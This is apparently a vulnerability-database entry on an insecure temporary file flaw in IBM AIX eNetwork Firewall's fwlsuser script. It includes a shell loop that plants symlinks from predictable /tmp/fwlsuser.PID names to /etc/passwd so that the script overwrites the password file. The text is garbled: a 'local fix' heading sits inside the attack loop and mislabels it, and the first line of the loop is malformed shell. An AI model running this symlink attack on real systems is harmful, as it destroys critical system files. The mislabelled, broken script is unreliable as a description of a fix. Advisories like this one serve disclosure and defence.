IBM AIX eNetwork Firewall 3.2/3.3 Insecure Temporary File Creation Vulnerabilities

2014-07-01T00:00:00
ID SSV:73171
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                soure: http://www.securityfocus.com/bid/287/info

IBM's eNetwork Firewall for AIX contains a number of vulnerability in scripts which manipulate files insecurely. When fwlsuser script is run it creates a temporary file called /tmp/fwlsuser.PID ( where PID is the process ID of the command being run ). If this file is created previously and is a link to any other file the output generated by the fwlsuser script will overwrite this linked file. 

x = 5000
while true

LOCAL FIX AS REPORTED BY ORIGINATOR:
ln -s /etc/passwd /tmp/fwlsuser.$x
# rm /tmp/fwlsuser.$x
let x=$x+1
echo $x
done
exit